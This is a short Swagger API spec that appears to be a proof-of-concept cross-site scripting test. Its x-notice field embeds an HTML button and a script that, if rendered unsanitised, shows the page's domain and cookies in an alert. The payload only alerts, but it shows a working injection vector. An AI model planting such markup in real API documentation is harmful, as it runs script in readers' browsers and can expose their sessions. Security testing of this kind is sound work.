swagger: '2.0'
info:
  title: Alert Test
  x-notice: |
    <button style="padding: 12px 24px; font-size: 16px; background: #e74c3c; color: white; border: none; border-radius: 6px; cursor: pointer;">
      Click here to continue
    </button>

    <script>
      document.querySelector('button').onclick = function(){
        alert("XSS executed!\nDomain: " + document.domain + "\nCookie: " + document.cookie);
      }
    </script>
  version: 1.0.1
paths: {}
